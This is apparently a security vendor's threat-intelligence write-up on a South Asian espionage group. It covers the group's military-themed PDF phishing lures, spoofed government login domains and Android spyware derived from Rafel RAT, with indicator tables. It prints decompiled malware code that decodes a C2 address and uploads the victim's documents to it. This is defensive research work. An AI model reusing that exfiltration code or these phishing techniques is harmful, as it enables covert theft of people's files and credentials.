A South Asian APT has been persistently targeting Sri Lanka, Bangladesh, Pakistan, and Turkey. This post walks through infrastructure and malware pivots to expose novel tooling that compromised the phones of military-adjacent folks.
Recently a zip was detected named Coordination of the Chief of Army Staff's Visit to China.zip. An archive with this theme sticks out like a sore thumb to threat analysts.
Indeed, upon examining the compressed PDF, it was an obviously targeted phish.
Phish lure
Figure 1: Top level PDF phish
Phish decoy
Figure 2: Decoy shown post cred theft
The first pivot an analyst makes is to look for similarly named documents, or that have similar embedded urls, which yielded the results below:
| Document Name | MD5 Hash | First Stage | Second Stage |
|---|---|---|---|
| Coordination of the Chief of Army Staff's Visit to China.pdf | cf9914eca9f8ae90ddd54875506459d6 | mail-mod-gov-bd-account-conf-files.netlify.app | mailbox3-inbox1-bd.com |
| Coordination of the Chief of Army Staff's Visit to China.pdf | 94e6911b0a99b54391735dfc70b4187d | coordination-cas-visit.netlify.app | mails.navy.mll.bd.account.file.centralized-email-system-np.com |
| Coordination of the Chief of Army Staff's Visit to China.pdf | 3c47053adffd39b467592d13398060b5 | mail-dgfi-gov-bd-accounts-file-data-d.netlify.app | mailbox3-inbox1-bd.com |
| Updated TOSAM 120 MM MORTAR ALKAR 110, 120, TURKIYE.pdf | 33fe3e792a0e98fb890b6393f31ae5cb | drive-rokectsaans-com-tr-account-file.netlify.app | mailbox3-inbox1-bd.com |
| MAIN KEY POINTS OF CAS VISIT TO BOF (1).pdf | 73f142ae7c6c10fbb18f439b6410af4f | goc-visit-program-details-pdf.netlify.app | mailbox-inbox-bd.com |
| 079 24 CE Combined Training and Administrative Conference signed.pdf | c2ee24fb4aa103b4c1a8e8169d3a9f47 | combined-training-and-administrative.netlify.app | discord |
| Review .pdf | e573a2cd2b6a24255c400055d06342b9 | sdkfjsh23-sdfgdklhg4-efglhdfg4-dfgjkl.netlify.app | discord |
| MOU ON DEFENCE COOPERATION BETWEEN BANGLADESH AND KINGDOM OF SAUDI ARABIA KSA.pdf | 6e930ad2ab7e97da818f54bfbb45b759 | mail.gov.bd.account.file.updatemind52.com | mailbox-inbox-bd.com |
| SECRETARY OF DEFENCE INDUSTRIS OF THE PRESIDENCY OF THE REPUBLIC OF TURKIYE'S DELEGATION VISIT TO BD.pdf | abbb7063e3a6d03cf180f73b6ac15ee2 | mail.drive.gov.bd.files.updatemind52.com | - |
| AMDT EXAM CEN AND ALLOT INDEX NUMBER FOR PE (CAPT TO MAJ)-APR 2025.pdf | aef81736c6dcaf8b67775602cbf9ccbd | ebmail.police.gov.bd.updatemind52.com | mailbox-inbox-bd.com |
Figure 3: IDEF-themed phishing page, targeting Turks
The javascript that attempted to block “source viewing”, as seen in the image above, appeared unique. Looking at other phishing pages that contained the same blocker yielded quick results. The folks at Hunt IO regularly blog about an adjacent set of activity, as well as OSINT analysts Demon and Nouman.
| Phishing Domain | Spoof / Theme |
|---|---|
| dgdp-account-file-data-doc-procuremen.netlify.app | Directorate General of Defence Purchase (DGDP) |
| dgdp.cloud.secured.file.updatemind52.com | Directorate General of Defence Purchase (DGDP) |
| drive-afd-gov-bd-account-file.netlify.app | Government of Bangladesh |
| drive-army-mil-bd-account-data-file.netlify.app | Bangladesh Army |
| drive-baf-mil-bd-share-file.netlify.app | Bangladesh Air Force |
| drive-bcc-registraion-cloud-storage.netlify.app | Bangladesh Computer Council (BCC) |
| drive-newmail-arm-mil-bd-account-data.netlify.app | Bangladesh Army |
| drive-rokectsaans-com-tr-account-file.netlify.app | Roketsans (Turkey) |
| drive-roketsans-com-tr-account-files.netlify.app | Roketsans (Turkey) |
| embassy-of-italy-visit-to-cxb.netlify.app | Embassy of Italy |
| goc-visit-program-details-pdf.netlify.app | Gulf Countries |
| idef-2025-conf-data-file-tr-account-d.netlify.app | IDEF (International Defence Industry Fair) |
| idef2025-com-tr-files-drive-account.netlify.app | IDEF (International Defence Industry Fair) |
| mail-afd-gov-bd-account-error-issues.netlify.app | AFD Government of Bangladesh |
| mail-aselsans-com-tr-account-files-da.netlify.app | Aselsan (Turkish company) |
| mail-baf-mil-bd-account-data-files-document.pages.dev | Bangladesh Air Force |
| mail-baf-mil-bd-fils-cas-visit-to-chi.netlify.app | Bangladesh Air Force |
| mail-bof-gov-bd-cas-visit.netlify.app | BOF Government of Bangladesh |
| mail-dgfi-gov-bd-accounts-file-data-d.netlify.app | Directorate General of Forces Intelligence (DGFI) |
| mail-mod-gov-bd-account-conf-files.netlify.app | Ministry of Defence (MOD) |
| mail-mod-gov-bd-account-data-file.netlify.app | Ministry of Defence (MOD) |
| mail-mod-gov-np-account-file-data.netlify.app | Ministry of Defence (MOD) |
| mail.baf.mil.bd.pdf.quickhelpsolve.com | Bangladesh Air Force |
| mail.bcc.gov.bd.pdf.quickhelpsolve.com | Bangladesh Computer Council (BCC) |
| newmail-army-mil-bd-owa-apth-mail-dat.netlify.app | Bangladesh Army |
| newmail-army-mil-bd-pso-meeting-file.netlify.app | Bangladesh Army |
| webmail.police.gov.bd.updatemind52.com | Bangladesh Police |
| coordination-cas-visit.netlify.app | - |
Reexamining our previous set of c2s, there was another error message that we could key off. The landing page on the domain was reused, which hard coded a particular unix timestamp, corresponding to March 28th, 2025.
Figure 4: Landing page with hard coded timestamp
This landing page was similarly seen on many other similar looking domains:
| Phishing Domain | Spoof / Theme |
|---|---|
| mail.afd.gov.bd.file.quickhelpsolve.com | AFD Government of Bangladesh |
| webmil.assangroup.com.tr.asd.updatemind52.com | Assan Group (Turkish company) |
| mail.bcc.gov.bd.pdf.quickhelpsolve.com | Bangladesh Computer Council (BCC) |
| mails.navy.mll.bd.account.file.centralized-email-system-np.com | Bangladesh Navy |
| webmail.police.gov.bd.updatemind52.com | Bangladesh Police |
| dgdp.gov.bd.file.pdf.updatemind52.com | Directorate General of Defence Purchase (DGDP) |
| dgdp.gov.bd.cloud.file.updatemind52.com | Directorate General of Defence Purchase (DGDP) |
| dgdp.cloud.secured.file.updatemind52.com | Directorate General of Defence Purchase (DGDP) |
| cloud.dgdp.gov.bd.file.updatemind52.com | Directorate General of Defence Purchase (DGDP) |
| mail.dgfi.gov.bd.pdf.updatemind52.com | Directorate General of Forces Intelligence (DGFI) |
| mail.gov.bd.account.file.updatemind52.com | Government of Bangladesh |
| mail.drive.gov.bd.files.updatemind52.com | Government of Bangladesh |
| mail.mofa.gov.pk.pdf.updatemind52.com | Ministry of Foreign Affairs (MOFA) Pakistan |
| mail.mofa.gov.pk.file.updatemind52.com | Ministry of Foreign Affairs (MOFA) Pakistan |
| cloud.national.email.pdf.updatemind52.com | - |
| webmail.paragonms.com.pk.pdf.updatemind52.com | Paragon (Pakistan-based company) |
| webmail.profen.com.pdf.updatemind52.com | Profen |
| webmail.timgosavunma.com.tr.file.updatemind52.com | Timgos Savunma (Turkish company) |
| mail.163.com.files.updatemind52.com | - |
| mail.awany.org.file.updatemind52.com | - |
| mailairforce.quickhelpsolve.com | Bangladesh Air Force mail |
| mail.bangladesh.air.quickhelpsolve.com | Bangladesh Air Force |
| dgdp.cloud.files.pdf.updatemind52.com | Bangladesh DGDP |
| dgdp.cloud.file.pdf.updatemind52.com | Bangladesh DGDP |
| dgdp.cloud.secured.file.updatemind52.com | Bangladesh DGDP |
| dgdp.gov.bd.secured.updatemind52.com | Bangladesh DGDP |
| drive.egovcloud.gov.bd.quickhelpsolve.com | Bangladesh government |
| inboxofficial-bd.com | Bangladesh government |
| webmail.police.gov.bd.updatemind52.com | Bangladesh police |
| mail.bhclondon.org.uk.quickhelpsolve.com | Bangladesh High Commission |
| webmail.bmsdefence.com.pdf.updatemind52.com | BMS Defence |
| bsgrouponline.com.webmail.pdf.updatemind52.com | - |
| live.login.account.out.quickhelpsolve.com | - |
| cloud.national.email.file.updatemind52.com | - |
www.centralized-email-system-np.com | Nepal government |
| profen.com.fil.login.updatemind52.com | Profen login |
| apm.vpce.gdw55e.quickhelpsolve.com | - |
| updatemind52.com | - |
| quickhelpsolve.com | - |
| play-googyle.com More analysis by Aaron Samala / Checkpoint | - |
Pivoting on updatemind52.com, which was also mentioned by Twitter user AiTM, we can see an APK file hosted at updatemind52.com/Love_Chat.apk. This is a mod of an open source Android RAT, Rafel Rat, the source of which can be reviewed here.
| updatemind52.com/Love_Chat.apk | 9a7510e780ef40d63ca5ab826b1e9dab |
Below, we can see the decompiled APK file uploading various document types from the device to the c2.
1[ Caption | Figure 5: h/t to dex2jar ]
2public InternalService() {
3 byte[] arrayOfByte = Base64.decode("aHR0cHM6Ly9xdWlja2hlbHBzb2x2ZS5jb20vcHVibGljL2NvbW1hbmRzLnBocA==", 0);
4 this.decodedBytes = arrayOfByte;
5 this.SERVER_URI = new String(arrayOfByte);
6 }
7 private void processFile(File paramFile) {
8 if (paramFile.length() == 0L)
9 return;
10 String str = paramFile.getAbsolutePath();
11 if (str.endsWith(".pdf") || str.endsWith(".ppt") || str.endsWith(".pptx") ||
12 str.endsWith(".doc") || str.endsWith(".jpeg") || str.endsWith(".jpg") ||
13 str.endsWith(".docx") || str.endsWith(".xls") || str.endsWith(".xlsx"))
14 uploadFile(paramFile);
15 }
16 private void uploadFile(File paramFile) {
17 HashMap<Object, Object> hashMap = new HashMap<Object, Object>();
18 hashMap.put("device_id", this.deviceUniqueId);
19 AndroidNetworking.upload(this.SERVER_URI).addMultipartFile("upload_file_nm", paramFile)
20 .addMultipartParameter(hashMap)
21 .setPriority(Priority.HIGH).setExecutor(Executors.newSingleThreadExecutor()).build()
22 .getAsJSONObject(new JSONObjectRequestListener() {
23 final InternalService this$0;
24
25 public void onError(ANError param1ANError) {}
26
27 public void onResponse(JSONObject param1JSONObject) {}
28 });
29 }aHR0cHM6Ly9xdWlja2hlbHBzb2x2ZS5jb20vcHVibGljL2NvbW1hbmRzLnBocA== decodes to the c2, https://quickhelpsolve.com/public/commands.php, which we saw used by this actor for credential phishing. That same domain was used in the malicious APK b8eda465ffbc197d80a9ce7ab785f07a, and with other simple pivots, we can find a cluster of other APK.
| App Name | MD5 | C2 | Decoy |
|---|---|---|---|
Love_Chat.apk | 9a7510e780ef40d63ca5ab826b1e9dab | quickhelpsolve.com | - |
TestMe.apk | 78bc9707f298552b7087ef385f098912 | kutcat-rat.com | lovehabibi.com |
PvtChat1.apk | dfa353ac65b29df7d14f72aca7d52f12 | kutcat-rat.com | lovehabibi.com |
| - | b8eda465ffbc197d80a9ce7ab785f07a | quickhelpsolve.com | lovehabibi.com |
PvtChat.apk | ce417487ac9ccfbb31fa28fde9365fd7 | kutcat-rat.com | isexychat.com |
TestMe.apk | 67e7cf00aa82d9b4cf0db2b55b7fb0b9 | kutcat-rat.com | - |
| - | 0d106fd047d6a744b1dbecddbe9c2e99 | kutcat-rat.com | - |
Social Chat.apk | 01011bd3c58141165f2a4551f4c40609 | kutcat-rat.com | playservicess.com |
Securechat.apk | 65a08e14ca41bfedf483d1ada74844a9 | kutcat-rat.com | lovehabibi.com |
Securechat.apk | c8d2bf204349853b6d7d810ed2698924 | kutcat-rat.com | lovehabibi.com |
voting.apk | 12b6483d4843e99b57b86379197208cd | kutcat-rat.com | UN voting page |
BSM.apk | 3b26fcd7c6994598dc53bb3f69725d68 | play-googyle.com | whatsapp download |
Figure 6: obligatory non-ida ida screenshot showing how the decoy was launched
The apps themselves are standard infostealers, as well as a remote shell to execute arbitrary commands. Sample permissions and actions include, but are not limited to, ADD_DEVICE_ADMIN, READ_EXTERNAL_STORAGE, MANAGE_APP_ALL_FILES_ACCESS_PERMISSION, READ_CONTACTS, READ_MEDIA_VIDEO etc.
The landing pages and decoys are similar to what one would expect. A notable Pakistani dating service was a key pivot point to find other related samples.
From the above play-googyle.com and playservicess.com, we can see a crossover in the email registrant from the whois scanner in the free community version of SilentPush. This registrant noraramly30121982@yahoo.com was seen on another similar domain in '24 mailservicess.com. Additionally, this email address, except on gmail (noraramly30121982@gmail.com) was used to register mailserver-lk.com which has been used prolifically to phish, and has been catalogued by ThreatBook, as well as our own Labs account. As always, Maltrail is a great resource for aggregating indicators from the OSINT community.
Figure 10: SilentPush free WHOIS scanner
The kutcat c2 is a modded version of Rafel-rat, notably with the credits from the original author removed from the panel. The c2 has the ability to send down arbitrary commands to compromised phones. If one has good dns telem, gj3nyrs9jqrslv5hbej92406cxin6c.burpcollaborator.net may be a useful indicator. kutcat-rat.com was also mentioned by Twitter user MHT.
Figure 11: Commands sent to selected compromised phones
Below one can see the c2 panel, which was publicly available and indexed by google, with device information, and was disabled prior to this blog post. On the server was a plethora of stolen content, including documents, raw SMS, and contact lists. In the content, it was abundantly clear that many of the victims were members of the military of multiple South Asian countries, as well as close contacts, based on phone address books that only included ranks and duty stations.
Figure 12: C2 panel
Figure 16: Victims by country
The first phone UUID in the list ffffffff-e76f-903a-ffff-ffffef05ac4a reports to be in India, and has installed an apk SetupIndiaServicesTnC.apk. The first phone on an operational server often is a test/developer account, and in this case, contained data that was part of a test rig. A consecutive UUID ffffffff-e76f-903a-ffff-ffffef05ac4b also appears in the device list. The uuid is constructed using nisrulz's easydeviceinfo.
Lastly, the threat actor also leverages windows malware, leveraging the same C2 infrastructure. These samples are available in the index.
| Top level file | Intermediary | C2 |
|---|---|---|
EX AMAN-2025.zip | updatemind52.com/asdf.6786708906 | play-googyle.com |
4e13a48db966b3ebffb1fd49b3d2af8e | quickhelpsolve.com/asdf.6786708906 | play-googyle.com |
outgoing Farewell - Invitation.zip | - | play-googyle.com |
| Vendor | Name |
|---|---|
| Proofpoint | UNK_ArmyDrive |
| You? | Get in touch for blog pre-releases! |
Figure 19: Vendor validated names
Our github provides a download of the relevant files mentioned in the blog, except those that contain victim identifying information
| Hunting leads you may find useful |
|---|
| C:\Users\Android\Desktop\full working with all and url encrypt\x64\Release\ConsoleApplication1.pdb |
| C:\Users\Android\Desktop\lsass - Copy\x64\Release\ConsoleApplication1.pdb |
| C:\Users\Android\Desktop\work\d\x64\Release\ConsoleApplication1.pdb |
| C:\Users\user\Desktop\c\d\x64\Release\ConsoleApplication1.pdb |
| C:\Users\user\Desktop\cache\apk\c\i\x64\Debug\ConsoleApplication1.pdb |
| C:\Users\user\Desktop\ppp\app\c\d\x64\Debug\ConsoleApplication1.pdb |
| Network strings containing "ghijkl" |
emails addresses containing noraramly30121982 or qesy.35fysel (securedownloadfiles.com → downloadattachment.com) |
midtearmy@gmail.com, itdtearmy@gmail.com |
Acknowledgements
The authors would like to thank the reviewers, as well as peer vendors, for their comments and corrections. Please get in touch at research@strikeready.com if you have corrections, would like us to use your group name, or would like to collaborate on research.
